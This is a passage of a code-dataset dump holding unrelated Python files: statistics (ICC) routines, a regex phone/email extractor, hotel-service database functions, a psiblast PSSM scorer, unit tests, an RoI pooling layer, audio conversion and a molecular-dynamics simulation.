min_cases=part_thr_emp)\n if np.max(part) == 0:\n warnings.warn(f'Cannot find any subtypes that satisfy the criteria! Partition is empty.\\n'\n f' Subtyping {data_stack.shape[0]} cases in {mode} mode with a distance cutoff of '\n f'{dist_thr_emp } and a minimum number of cases per subtype of {part_thr_emp} ')\n else:\n raise Exception(f'{mode} is not implemented as mode to generate subtypes. Please use \"classic\" or \"core\".')\n\n return part, dist, order\n\n\ndef subtype_weights(data_stack, subtypes):\n \"\"\"\n\n :param subtypes: 2D array of shape (n_subtype, n_voxel) or a list of 2D arrays, one for each seed region\n :param data_stack: 2D or 3D array of shape (n_subjects, n_voxel, n_seeds) - last optional\n :return: weight matrix as 2D or 3D array with shape (n_subjects, n_subtypes, n_seeds) - last optional\n \"\"\"\n if not type(subtypes) == list:\n if subtypes.size == 0:\n warnings.warn(f'I encountered an empty subtype map. This can happen if the corresponding partition that '\n f'generated this subtypes was thresholded until there were no individuals in a subtype '\n f'left. I will not crash here but I will return all NaN weights. Goodbye.')\n # I will create all-zero weights if the subtype map is an empty array (indicating that this is a seed\n # without any satisfactory subtypes\n weights = np.empty(shape=(data_stack.shape[0], 1))\n weights[:] = np.nan\n\n elif not subtypes.ndim == 2 or not data_stack.ndim == 2:\n raise Exception(f'subtypes and data must have the same dimensions: '\n f'subtypes ({subtypes.ndim}; {type(subtypes)}) '\n f'data ({data_stack.ndim}; {type(data_stack)})')\n\n else:\n weights = corr2_coeff(data_stack, subtypes)\n else:\n if not len(subtypes) == data_stack.shape[2]:\n raise Exception(f'Data is 3D but the number of seed regions is mismatched between subtypes and data: '\n f'subtype ({len(subtypes)}) and data ({data_stack.shape[2]})')\n n_seeds = len(subtypes)\n weights = [subtype_weights(data_stack[..., seed_id], subtypes[seed_id]) for seed_id in range(n_seeds)]\n return weights\n\n\ndef compute_icc(ratings, cse, kind):\n \"\"\"\n Computes the interclass correlations for indexing the reliability analysis\n according to shrout & fleiss' schema.\n\n ratings - ratings data matrix, data whose rows represent different\n ratings/raters & whose columns represent different cases or\n targets being measured. Each target is assumed too be a random\n sample from a population of targets.\n cse - 1 2 or 3: 1 if each target is measured by a different set of\n raters from a population of raters, 2 if each target is measured\n by the same raters, but that these raters are sampled from a\n population of raters, 3 if each target is measured by the same\n raters and these raters are the only raters of interest.\n kind - 'single' or 'k': denotes whether the ICC is based on a single\n measurement or on an average of k measurements, where\n k = the number of ratings/raters.\n\n % REFERENCE:\n% Shrout PE, Fleiss JL. Intraclass correlations: uses in assessing rater\n% reliability. Psychol Bull. 1979;86:420-428\n%\n% NOTE:\n% This code was mainly modified with the Kevin's codes in web.\n% (London kevin.brownhill@kcl.ac.uk)\n%\n% XINIAN ZUO\n% Email: zuoxinian@gmail.com\n\n% if isanova\n% [p,table,stats] = anova1(x',{},'off');\n% ICC=(table{2,4}-table{3,4})/(table{2,4}+table{3,3}/(table{2,3}+1)*table{3,4});\n% else\n \"\"\"\n\n # k is the number of raters, and n is the number of targets\n k, n = ratings.shape\n # mean per target\n mpt = np.mean(ratings, 0)\n # mean per rater\n mpr = np.mean(ratings, 1)\n # get total mean\n tm = np.mean(ratings)\n # within target sum sqares\n wss = np.sum(np.square(ratings - mpt))\n # within target mean sqares\n wms = wss / (n * (k - 1))\n # between rater sum squares\n rss = np.sum(np.square(mpr - tm)) * n\n # between rater mean squares\n rms = rss / (k - 1)\n # between target sum squares\n bss = np.sum(np.square(mpt - tm)) * k\n # between target mean squares\n bms = bss / (n - 1)\n # residual sum of squares\n ess = wss - rss\n # residual mean squares\n ems = ess / ((k - 1) * (n - 1))\n\n if cse == 1:\n if kind == 'single':\n icc = (bms - wms) / (bms + (k - 1) * wms)\n elif kind == 'k':\n icc = (bms - wms) / bms\n else:\n raise Exception(f'Wrong value for \"kind\": {kind}')\n elif cse == 2:\n if kind == 'single':\n icc = (bms - ems) / (bms + (k - 1) * ems + k * (rms - ems) / n)\n elif kind == 'k':\n icc = (bms - ems) / (bms + (rms - ems) / n)\n else:\n raise Exception(f'Wrong value for \"kind\": {kind}')\n elif cse == 3:\n if kind == 'single':\n icc = (bms - ems) / (bms + (k - 1) * ems)\n elif kind == 'k':\n icc = (bms - ems) / bms\n else:\n raise Exception(f'Wrong value for \"kind\": {kind}')\n else:\n raise Exception('Wrong value for \"cse\": {cse}')\n return icc, wms, bms\n","sub_path":"asdfc/.ipynb_checkpoints/stats-checkpoint.py","file_name":"stats-checkpoint.py","file_ext":"py","file_size_in_byte":18612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"206429272","text":"#! python \n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 3 09:37:58 2018\n@author: Chen YC\n\"\"\"\n\nimport pyperclip\nimport re\n\n\n\ntext = pyperclip.paste()\n\npatternPhone = r'.?(\\d\\d.?\\d\\d\\d\\d?-?\\d\\d\\d\\d)'\npatternEmail=r'([A-Za-z0-9\\._%]+@.+\\w)'\n\npatternPhone=re.compile(patternPhone)\npatternEmail = re.compile(patternEmail)\n\nmoPhone=patternPhone.findall(text)\nmoEmail=patternEmail.findall(text)\n\ntextPhone=','.join(moPhone)\ntextEmail=','.join(moEmail)\nprint(moPhone)\nprint(moEmail)\n\npyperclip.copy(textPhone)\npyperclip.copy(textEmail)\n\nprint('the phone and email are copied to the clipboard')","sub_path":"regularExpressionProject.py","file_name":"regularExpressionProject.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301681888","text":"# -*- coding: utf-8 -*-\n'''Modulo que recoge las funciones para la administracion de los servicios (inserciones, listar, modificaciones...)\n'''\nimport variables, conexion\n\ndef listPrecios():\n '''funcion que lista los precios de los sercvicios básicos.\n\n @return:\n '''\n try:\n conexion.cur.execute('SELECT PRECIO FROM PRECIOS WHERE SERVICIO IN (\"DESAYUNO\", \"COMIDA\", \"PARKING\")')\n listadoPrecios = conexion.cur.fetchall()\n conexion.conex.commit()\n for i in range(3):\n variables.entDialogoServicios[i].set_text(str(listadoPrecios[i][0]))\n\n except Exception as e:\n print('Error en funcionesServicios ', e)\n\ndef cambiarPrecios():\n '''Funcion que modifica los precios de los servicios básicos.\n\n @return:\n '''\n try:\n servicios = ('DESAYUNO', 'COMIDA', 'PARKING')\n for i in range(3):\n conexion.cur.execute('UPDATE PRECIOS SET PRECIO = ? WHERE SERVICIO = ?', (int(variables.entDialogoServicios[i].get_text()), servicios[i]))\n conexion.cur.execute('UPDATE SERVICIOS SET PRECIO = ? WHERE SERVICIO = ?', (int(variables.entDialogoServicios[i].get_text()), servicios[i]))\n conexion.conex.commit()\n listServicios()\n except Exception as e:\n print('Error en funcionesServicios cambiarPrecios ', e)\n\ndef listServicios():\n '''Funcion que lista los servicios de una determinada reserva y los muestra en el grid de facturacion.\n\n @return:\n '''\n try:\n for i in range(6):\n for j in range(4):\n variables.gridServicios.get_child_at(j, i + 2).set_text(\"\")\n dniCliente = variables.entFactura[0].get_text()\n conexion.cur.execute('SELECT SERVICIO FROM SERVICIOS WHERE DNICLIENTE = ?', (dniCliente,))\n listaTuplasServicios = conexion.cur.fetchall()\n listaServicios = []\n for registro in listaTuplasServicios:\n listaServicios.append(registro[0])\n print(listaServicios)\n listaPrecios = []\n for registro in listaServicios:\n conexion.cur.execute('SELECT SERVICIO, PRECIO FROM SERVICIOS WHERE SERVICIO = ? AND DNICLIENTE = ?', (registro,dniCliente))\n listaPrecios.append(conexion.cur.fetchall())\n print(listaPrecios)\n conexion.conex.commit()\n entriesGrid = []\n numeroNoches = variables.gridServicios.get_child_at(1, 1).get_text()\n for i in range(len(listaPrecios)):\n entriesGrid.append((listaPrecios[i][0][0], numeroNoches, listaPrecios[i][0][1], str(float(listaPrecios[i][0][1]) * float(numeroNoches))))\n for i in range(len(entriesGrid)):\n print(i)\n for j in range(4):\n print(j)\n variables.gridServicios.get_child_at(j, i+2).set_text(entriesGrid[i][j])\n print(variables.gridServicios.get_child_at(j, i+2).get_text())\n except Exception as e:\n print('Error listando servicios', e)\n\ndef listTreeServicios():\n '''Funcion que lista los servicios de una determinada reserva y los muestra en el treeView de Servicios.\n\n @return:\n '''\n try:\n variables.listServicios.clear()\n dniCliente = variables.entFactura[0].get_text()\n conexion.cur.execute('SELECT CODIGO, DNICLIENTE, SERVICIO, PRECIO FROM SERVICIOS WHERE DNICLIENTE = ? AND SERVICIO NOT IN (?,?,?)', (dniCliente,\"DESAYUNO\",\"COMIDA\",\"PARKING\"))\n listado = conexion.cur.fetchall()\n for tupla in listado:\n variables.listServicios.append(tupla[0:4])\n except Exception as e:\n print('Error listando servicios', e)\n\ndef limpiarEntServicios():\n try:\n variables.entServicioAdicional.set_text(\"\")\n variables.entPrecioServicioAdicional.set_text(\"\")\n except Exception as e:\n print(\"Error limpiando servicios\", e)\n\n\n","sub_path":"funcionesServicios.py","file_name":"funcionesServicios.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18764636","text":"from Bio import SeqIO\nfrom Bio.Alphabet import IUPAC\nfrom Bio.PDB import PDBParser\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.SeqUtils import IUPACData\nfrom Bio.SubsMat.MatrixInfo import blosum62, pam30\nfrom subprocess import Popen, PIPE\n\nimport os\nimport time\n\nSWISSPROT_PATH = os.path.abspath(\"/data/Database/blast/db/swissprot\")\nUNIREF90_PATH = os.path.abspath(\"/data/Database/blast/db/uniref90.fa\")\n\nclass BLOSUM62(object):\n def __init__(self,aa_from,aa_to):\n self.aa_from = aa_from\n self.aa_to = aa_to\n \n def run(self):\n score = int()\n try:\n score = blosum62[(self.aa_from,self.aa_to)]\n except:\n score = blosum62[(self.aa_to,self.aa_from)]\n return {'blosum62':score}\n\nclass PAM30(object):\n def __init__(self,aa_from,aa_to):\n self.aa_from = aa_from\n self.aa_to = aa_to\n \n def run(self):\n score = int()\n try:\n score = pam30[(self.aa_from,self.aa_to)]\n except:\n score = pam30[(self.aa_to,self.aa_from)]\n return {'pam30':score}\n\nclass PSSM(object):\n def __init__(self,pdb_file,chain,mutation):\n self.pdb_file = pdb_file\n self.chain = chain\n self.mutation = mutation\n self.aa_from = mutation[0]\n self.aa_to = mutation[-1]\n self.mapping_dict = dict()\n \n def get_fasta_from_PDB(self):\n parser = PDBParser()\n structure = parser.get_structure(self.pdb_file, self.pdb_file)\n model = structure[0]\n chain = [chain for chain in model if chain.id == self.chain][0]\n sequence = str()\n\n for i,residue in enumerate(chain.get_residues()):\n self.mapping_dict[str(residue.id[1])] = i+1\n sequence += IUPACData.protein_letters_3to1[residue.resname.title()]\n\n seq_id = str(time.time()).replace('.','')\n protein_name = 'protein_{}'.format(seq_id)\n fasta_file = self.pdb_file.replace('.pdb','.{}.fasta'.format(seq_id))\n record = (SeqRecord(Seq(sequence, IUPAC.protein), id=protein_name, description=\"\"))\n SeqIO.write(record, fasta_file, \"fasta\")\n\n return fasta_file\n \n def get_score_from_file(self,ascii_file):\n mut_dic={'A':2,'R':3, 'N':4, 'D':5, 'C':6, 'Q':7, 'E':8, 'G':9, 'H':10, 'I':11, 'L':12, 'K':13, 'M':14, 'F':15, 'P':16, 'S':17, 'T':18, 'W':19, 'Y':20, 'V':21}\n whole_list=[['residue_number','residue_name','A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']]\n\n pssm_lines = open(ascii_file,'r').readlines()\n\n for line in pssm_lines:\n if len(line) > 180:\n temp_list = list()\n resID_n_name = list(filter(None,line[0:10].split(' ')))\n score_list = list(filter(None,line[10:92].split(' ')))\n\n temp_list.extend(resID_n_name)\n temp_list.extend(score_list)\n whole_list.append(temp_list)\n\n elif len(line) == 162:\n temp_list = list()\n resID_n_name = list(filter(None,line[0:10].split(' ')))\n score_list = list(filter(None,line[10:71].split(' ')))\n\n temp_list.extend(resID_n_name)\n temp_list.extend(score_list)\n whole_list.append(temp_list)\n\n residue_number = self.mapping_dict[self.mutation[1:-1]]\n score = int(whole_list[residue_number][mut_dic.get(self.mutation[-1])])\n return score\n\n def run(self):\n fasta_file = self.get_fasta_from_PDB()\n # dbs = {'swissprot':SWISSPROT_PATH,'uniref90':UNIREF90_PATH}\n dbs = {'swissprot':SWISSPROT_PATH}\n\n results = dict()\n for db_name,db_path in dbs.items():\n log_file_PAM30 = fasta_file.replace('.fasta','.{}.log'.format('PAM30.'+db_name))\n ascii_file_PAM30 = fasta_file.replace('.fasta','.{}.ascii'.format('PAM30.'+db_name))\n output_PAM30 = Popen([\"psiblast\", \"-db\", db_path, \"-query\", fasta_file, \"-evalue\", \"1e-10\", \"-out\", log_file_PAM30, \"-num_iterations\", \"3\", \"-out_ascii_pssm\", ascii_file_PAM30, \"-matrix\", \"PAM30\", \"-seg\", \"yes\", \"-num_threads\", \"6\", \"-comp_based_stats\", \"1\"],stdout=PIPE,stderr=PIPE).communicate()[0]\n\n results[\"pssm_{}\".format('PAM30_'+db_name)] = self.get_score_from_file(ascii_file_PAM30)\n\n # log_file_BLOSUM62 = fasta_file.replace('.fasta','.{}.log'.format('BLOSUM62.'+db_name))\n # ascii_file_BLOSUM62 = fasta_file.replace('.fasta','.{}.ascii'.format('BLOSUM62.'+db_name))\n # output_BLOSUM62 = Popen([\"psiblast\", \"-db\", db_path, \"-query\", fasta_file, \"-evalue\", \"1e-10\", \"-out\", log_file_BLOSUM62, \"-num_iterations\", \"3\", \"-out_ascii_pssm\", ascii_file_BLOSUM62, \"-matrix\", \"BLOSUM62\", \"-seg\", \"yes\", \"-num_threads\", \"6\", \"-comp_based_stats\", \"1\"],stdout=PIPE,stderr=PIPE).communicate()[0]\n #\n # results[\"pssm_{}\".format('BLOSUM62_'+db_name)] = self.get_score_from_file(ascii_file_BLOSUM62)\n\n\n return results\n","sub_path":"substitution_matrices.py","file_name":"substitution_matrices.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339901327","text":"import os\n\n# Specify the directory you want to start from\nrootDir = 'E:/ai_integration2/MyProject8/Plugins/GPT2_Conv_AI_Plugin_UE/Source/GPT2_Conv_AI_Plugin_UE/ThirdParty/pytorch-main (2)'\n\nfor dirName, subdirList, fileList in os.walk(rootDir):\n for fname in fileList:\n if fname.endswith('.cpp'):\n include = '#include \"{}\"'.format(fname.replace('.cpp', '.h'))\n \n with open(os.path.join(dirName, fname), 'r', encoding='utf-8') as f:\n content = f.read()\n with open(os.path.join(dirName, fname), 'w', encoding='utf-8') as f:\n f.write(include + '\\n' + content)\n\nprint(\"Done!\")\n","sub_path":"Unreal Plugin Development/Fix PyTorch Import initial errors.py","file_name":"Fix PyTorch Import initial errors.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"54977270","text":"# coding: utf-8\n\nimport unittest\nimport random\nimport tempfile\nfrom pathlib import Path\n\nfrom .context import dgp\nfrom dgp.lib.gravity_ingestor import read_at1a\nfrom dgp.lib.project import *\nfrom dgp.lib.meterconfig import *\n\n\nclass TestProject(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Set up some dummy classes for testing use\"\"\"\n self.todelete = []\n self.project = AirborneProject(path='tests', name='Test Airborne Project')\n\n # Sample values for testing meter configs\n self.meter_vals = {\n 'gravcal': random.randint(200000, 300000),\n 'longcal': random.uniform(150.0, 250.0),\n 'crosscal': random.uniform(150.0, 250.0),\n 'cross_lead': random.random()\n }\n self.at1a5 = MeterConfig(name=\"AT1A-5\", **self.meter_vals)\n self.project.add_meter(self.at1a5)\n\n def test_project_directory(self):\n \"\"\"\n Test the handling of the directory specifications within a project\n Project should take an existing directory as a path, raising FileNotFoundError if it doesnt exist.\n If the path exists but is a file, Project should automatically strip the leaf and use the parent path.\n \"\"\"\n with self.assertRaises(FileNotFoundError):\n project = GravityProject(path=Path('tests/invalid_dir'))\n\n with tempfile.TemporaryDirectory() as td:\n project_dir = Path(td)\n project = GravityProject(path=project_dir)\n self.assertEqual(project.projectdir, project_dir)\n\n # Test exception given a file instead of directory\n with tempfile.NamedTemporaryFile() as tf:\n tf.write(b\"This is not a directory\")\n with self.assertRaises(NotADirectoryError):\n project = GravityProject(path=Path(str(tf.name)))\n\n def test_pickle_project(self):\n # TODO: Add further complexity to testing of project pickling\n flight = Flight(None, 'test_flight', self.at1a5)\n flight.add_line(100, 250.5)\n self.project.add_flight(flight)\n\n with tempfile.TemporaryDirectory() as td:\n save_loc = Path(td, 'project.d2p')\n self.project.save(save_loc)\n\n loaded_project = AirborneProject.load(save_loc)\n self.assertIsInstance(loaded_project, AirborneProject)\n self.assertEqual(len(loaded_project.flights), 1)\n self.assertEqual(loaded_project.flights[flight.uid].uid, flight.uid)\n self.assertEqual(loaded_project.flights[flight.uid].meter.name, 'AT1A-5')\n\n def test_flight_iteration(self):\n test_flight = Flight(None, 'test_flight', self.at1a5)\n line0 = test_flight.add_line(100.1, 200.2)\n line1 = test_flight.add_line(210, 350.3)\n lines = [line0, line1]\n\n for line in test_flight:\n print(line)\n self.assertTrue(line in lines)\n\n # TODO: Fix ImportWarning generated by pytables?\n @unittest.skip('New add_data test not implemented')\n def test_associate_flight_data(self):\n \"\"\"Test adding a data file and associating it with a specific flight\"\"\"\n self.todelete.append('tests/prjdata.h5') # Cleanup when done\n\n flt = Flight(self.at1a5)\n self.project.add_flight(flt)\n\n data1 = 'tests/test_data.csv'\n self.project.add_data(data1, flight=flt)\n\n data1path = os.path.abspath(data1)\n self.assertTrue(data1path in self.project.data_sources.values())\n\n test_df = read_at1m(data1)\n grav_data, gps_data = self.project.get_data(flt)\n self.assertTrue(test_df.equals(grav_data))\n self.assertIsNone(gps_data)\n\n\nclass TestFlight(unittest.TestCase):\n def setUp(self):\n pass\n\n\nclass TestMeterconfig(unittest.TestCase):\n def setUp(self):\n self.ini_path = os.path.abspath('tests/at1m.ini')\n self.config = {\n 'g0': 10000.0,\n 'GravCal': 227626.0,\n 'LongCal': 200.0,\n 'CrossCal': 200.1,\n 'vcc': 0.0,\n 've': 0.0,\n 'Cross_Damping': 550.0,\n 'Long_Damping': 550.0,\n 'at1_invalid': 12345.8\n }\n\n def test_MeterConfig(self):\n mc = MeterConfig(name='Test-1', **self.config)\n self.assertEqual(mc.name, 'Test-1')\n\n # Test get, set and len methods of the MeterConfig class\n self.assertEqual(len(mc), len(self.config))\n\n for k in self.config.keys():\n self.assertEqual(mc[k], self.config[k])\n # Test case-insensitive handling\n self.assertEqual(mc[k.lower()], self.config[k])\n\n mc['g0'] = 500.01\n self.assertEqual(mc['g0'], 500.01)\n self.assertIsInstance(mc['g0'], float)\n # Test the setting of non-float types\n mc['monitor'] = True\n self.assertTrue(mc['monitor'])\n\n mc['str_val'] = 'a string'\n self.assertEqual(mc['str_val'], 'a string')\n\n # Test the class handling of invalid requests/types\n with self.assertRaises(NotImplementedError):\n mc[0: 3]\n\n with self.assertRaises(NotImplementedError):\n MeterConfig.from_ini(self.ini_path)\n\n def test_AT1Meter_config(self):\n at1 = AT1Meter('AT1M-5', **self.config)\n\n self.assertEqual(at1.name, 'AT1M-5')\n\n # Test that invalid field was not set\n self.assertIsNone(at1['at1_invalid'])\n valid_fields = {k: v for k, v in self.config.items() if k != 'at1_invalid'}\n for k in valid_fields.keys():\n # Check all valid fields were set\n self.assertEqual(at1[k], valid_fields[k])\n\n def test_AT1Meter_from_ini(self):\n at1 = AT1Meter.from_ini(self.ini_path)\n\n # Check type inheritance\n self.assertIsInstance(at1, AT1Meter)\n self.assertIsInstance(at1, MeterConfig)\n\n self.assertEqual(at1.name, 'AT1M-1U')\n\n cfp = configparser.ConfigParser(strict=False) # strict=False to allow for duplicate keys in config\n cfp.read(self.ini_path)\n\n skip_fields = ['meter', '00gravcal']\n for k, v in cfp['Sensor'].items():\n if k in skip_fields:\n continue\n self.assertEqual(float(cfp['Sensor'][k]), at1[k])\n\n\n\n","sub_path":"tests/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"364784554","text":"import tensorflow as tf \nimport numpy as np\n\nslim = tf.contrib.slim\n\ndef roi_pool_layer(net,rois):\n \"\"\"RoI pooling layer uses max pooling to convert the\n features inside any valid region of interest into [7,7] feature map.\n\n Args:\n net: a tensor with shape [feature_map_height,feature_map_width,1024], it is an output of mobilenet v1\n rois: a tensor with shape [num_rois,5]\n Returns:\n fc: a tensor with shape [num_rois,7,7,1024] \n \"\"\"\n net_shape = tf.shape(net)\n height = tf.to_float(net_shape[0]) * 16.\n width = tf.to_float(net_shape[1]) * 16.\n batch_ids = tf.squeeze(tf.slice(rois, [0, 0], [-1, 1], name=\"batch_id\"), [1])\n x1 = tf.slice(rois, [0, 1], [-1, 1], name=\"x1\") / width\n y1 = tf.slice(rois, [0, 2], [-1, 1], name=\"y1\") / height\n x2 = tf.slice(rois, [0, 3], [-1, 1], name=\"x2\") / width\n y2 = tf.slice(rois, [0, 4], [-1, 1], name=\"y2\") / height\n \n # Won't be back-propagated to rois anyway, but to save time\n bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], axis=1))\n pre_pool_size = 7 * 2\n crops = tf.image.crop_and_resize(net, bboxes, tf.to_int32(batch_ids), [pre_pool_size, pre_pool_size], name=\"crops\")\n\n fc = slim.max_pool2d(crops, [2, 2], padding='SAME')\n return fc","sub_path":"layer_utils/roi_pool_layer.py","file_name":"roi_pool_layer.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161470852","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n\n path('admin/', admin.site.urls, name='admin-page'),\n path('employee/', include('employees.urls')),\n path('login/', include('login.urls')),\n path('register/', include('register.urls')),\n\n]\n","sub_path":"Employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18314564","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 8 08:32:17 2016\n\n@author: khaile\n\"\"\"\n\nbalance = 484\nannualInterestRate = 0.2\nmonthlyPaymentRate = 0.04\n\nfor n in range(12):\n monthlyPayment = balance * monthlyPaymentRate\n unpaidBalance = balance - monthlyPayment\n balance = unpaidBalance + annualInterestRate/12 * unpaidBalance\n \nprint(\"Remaining balance: \", round(balance, 2))","sub_path":"problem set 2/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605670273","text":"#%%\nimport numpy as np\nimport wave\nimport matplotlib.pyplot as plt\n\nimport os\nimport subprocess\nimport logging\nimport traceback\n\n#%%\noutputdir = os.path.abspath(\"wavefiles\")\nfor root, dirs, files in os.walk('.'):\n for f in files:\n path = os.path.join(root, f)\n base, ext = os.path.splitext(f)\n outputpath = os.path.join(outputdir, base + \".wav\")\n if ext == '.m4a':\n print(f'converting {path} to {outputpath}')\n status, output = subprocess.getstatusoutput(f'ffmpeg -i {path} {outputpath}')\n if status:\n logging.error (output)\n\n#%%\ndef read_wave(file_name):\n wavefile = wave.open(file_name, \"r\")\n framerate = wavefile.getframerate()\n data = wavefile.readframes(wavefile.getnframes())\n x = np.frombuffer(data, dtype=\"int16\")\n return x, framerate\n\n#%%\nv, fs = read_wave(\"wavefiles/input.wav\")\nprint(v.shape)\n\nr = np.arange(200)\nplt.plot(v[r])\nplt.ylabel('Amplitude')\nplt.show()\n","sub_path":"read_wave.py","file_name":"read_wave.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"302341570","text":"\nimport numpy as np\nimport InitialValues as init\nimport Simulation as sim\n\n# Variables\n# eps = 119.8 * 1.38064852 * 10**-23\n# sig = 3.405 * 10 ** -10\n\nAlgorithm = 'Verlet'\nNdim = 3 # Dimensions\nNpts = 5 # Number of spots\nLbox = 5 # Length of the box\nhstep = 0.004 # Time-step\nIter = 1 # Iterations\n\n\nNumdim = 3 #Width/height of big box\nNbox = Numdim**Ndim #Number of boxes\n\nremovethis = 1 # Check boxes beyond initial box\n\n\n\n# Function for relocating particles to initial box\ndef checkXbox(Xn, Lbox):\n Low = Xn < 0\n Hig = Xn > Lbox\n while any(Xn[Low] < 0):\n Low = Xn < 0\n Xn[Low] += Lbox\n while any(Xn[Hig] > Lbox):\n Hig = Xn > Lbox\n Xn[Hig] -= Lbox\n return Xn\n\n# Simulate initial positions\nXn = init.Latticepos(Npts,Lbox,Ndim)\n\n# Zero initial velocity and force\nVn = np.zeros((Npts,Ndim))\nFn = np.zeros((Npts,Ndim))\nfn = np.zeros((Npts,Ndim))\n\n\n# Create translation matrix\naddvec = np.array(np.linspace(-removethis,removethis,num=Numdim))*Lbox #Basic vector for matrix translation\naddarrx = np.tile(addvec,[1,Numdim]) #2D x translation matrix\naddarry = np.repeat(addvec,Numdim) #2D y translation matrix\n\nif Ndim == 2:\n addarr = np.vstack((addarrx,addarry)) #Combined 2D translation matrix\nelif Ndim == 3:\n addarrx = np.tile(addarrx,[1,Numdim]) #3D x TM\n addarry = np.tile(addarry,[1,Numdim]) #3D y TM\n addarrz = np.repeat(addvec,Numdim**2) #3D z TM\n addarr = np.vstack((addarrx,addarry,addarrz)) #Combined 3D TM\n\n# Initial Fn\n#########################################################\nabocor = np.zeros([Npts*Nbox,Ndim]) #Empty coordinates matrix\nidx = 0\nfor i_b in range(Nbox):\n for i_bs in range(Npts):\n abocor[idx,:] = Xn[i_bs,:] + addarr[:,i_b] #Get coordinates of particles in neighbor boxes\n idx += 1\n\nUn = np.zeros(Npts)\nfor i_bs in range(Npts):\n abodisc = (abocor - Xn[i_bs][np.newaxis,:]) #Distances from spot in central box\n abodisr = np.sqrt(np.sum(abodisc**2, axis=1)) #Distances R from spot\n\n self = abodisr != 0 #Find self in abodis matrices\n abodisr = abodisr[self] #Remove self from abodisr\n abodisc = abodisc[self,:] #Remove self from abodisc\n\n adudrr = 24*(abodisr**-8 -2*abodisr**-14) #dU/dr * 1/r\n Fn[i_bs,:] = np.sum(-abodisc*\n np.transpose([adudrr]), axis=0) #Force on particle on n\n Un[i_bs] = sum(4*(abodisr**-12-abodisr**-6)) #Pot. Energy on n\n#########################################################\n\nfor i_t in range(Iter):\n\n Kn = 1/2 * np.sum(Vn**2, axis = 1) #Kin. Energy on n\n En = np.array([Un, Kn, Un + Kn]) #Total energy p. particle on n\n Tn = np.sum(En,axis = 1) #Total system energy (per box)\n\n if Algorithm == \"Verlet\":\n Xn = Xn + Vn*hstep + hstep**2/2*Fn #X on n+1 (Verlet)\n elif Algorithm == \"Euler\":\n Xn = Xn + Vn * hstep #X on n+1 (Euler)\n\n Xn = checkXbox(Xn,Lbox)\n\n abocor = np.zeros([Npts * Nbox, Ndim]) # Empty coordinates matrix\n idx = 0\n for i_b in range(Nbox):\n for i_bs in range(Npts):\n abocor[idx, :] = Xn[i_bs, :] + addarr[:, i_b] # Get coordinates of particles in neighbor boxes\n idx += 1\n\n Un = np.zeros((Npts))\n for i_bs in range(Npts):\n abodisc = (abocor - Xn[i_bs][np.newaxis,:]) #Distances from spot in central box\n abodisr = np.sqrt(np.sum(abodisc**2, axis=1)) #Distances R from spot\n\n self = abodisr != 0 #Find self in abodis matrices\n abodisr = abodisr[self] #Remove self from abodisr\n abodisc = abodisc[self,:] #Remove self from abodisc\n\n adudrr = 24*(abodisr**-8 -2*abodisr**-14) #dU/dr * 1/r\n fn[i_bs,:] = np.sum(-abodisc*\n np.transpose([adudrr]), axis=0) #Force on particle on n + 1\n\n Un[i_bs] = sum(4*(abodisr**-12-abodisr**-6)) #Pot. Energy on n\n\n if Algorithm == \"Verlet\":\n Vn = Vn + hstep/2*(Fn+fn) #V on n+1 (Verlet)\n elif Algorithm == \"Euler\":\n Vn = Vn + Fn * hstep #V on n+1 (Euler)\n\n Fn = fn[:] #Overwrite Fn(n) with fn(n+1)\n","sub_path":"OLD/Day3.py","file_name":"Day3.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"345010103","text":"\"\"\"\nThis repo is based on https://github.com/wanglouis49/pytorch-weights_pruning code.\n\"\"\"\nimport os \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport pdb\n\nVALID_SIG = \"Valid\"\nACC_SIG = \"Test accuracy: \"\nTEST_SIG = \"Test on test set\"\n\n\n\ndef read_acc(file_name, sig, length=5):\n\tis_valid = False\n\tis_test = False\n\tfile = open(file_name, \"r\")\n\tacc = [0]\n\tsig_len = len(sig)\n\ttest_acc = -1\n\tfor l in file:\n\t\tif VALID_SIG in l:\n\t\t\tis_valid = True\n\t\tif TEST_SIG in l:\n\t\t\tis_test = True\n\t\tif (sig in l) and is_valid:\n\t\t\tacc.append(float(l[sig_len:sig_len+length]))\n\t\t\tis_valid = False\n\t\tif (sig in l) and is_test:\n\t\t\ttest_acc = float(l[sig_len:sig_len+length])\n\t\t\tis_test = False\n\tfile.close()\n\t#acc.append(test_acc)\n\treturn np.array(acc), test_acc\n\n\n\ndef reverse_smooth(acc):\n\tacc_new = []\n\t#print(acc)\n\tfor i in range(acc.shape[0]):\n\t\tif i >= 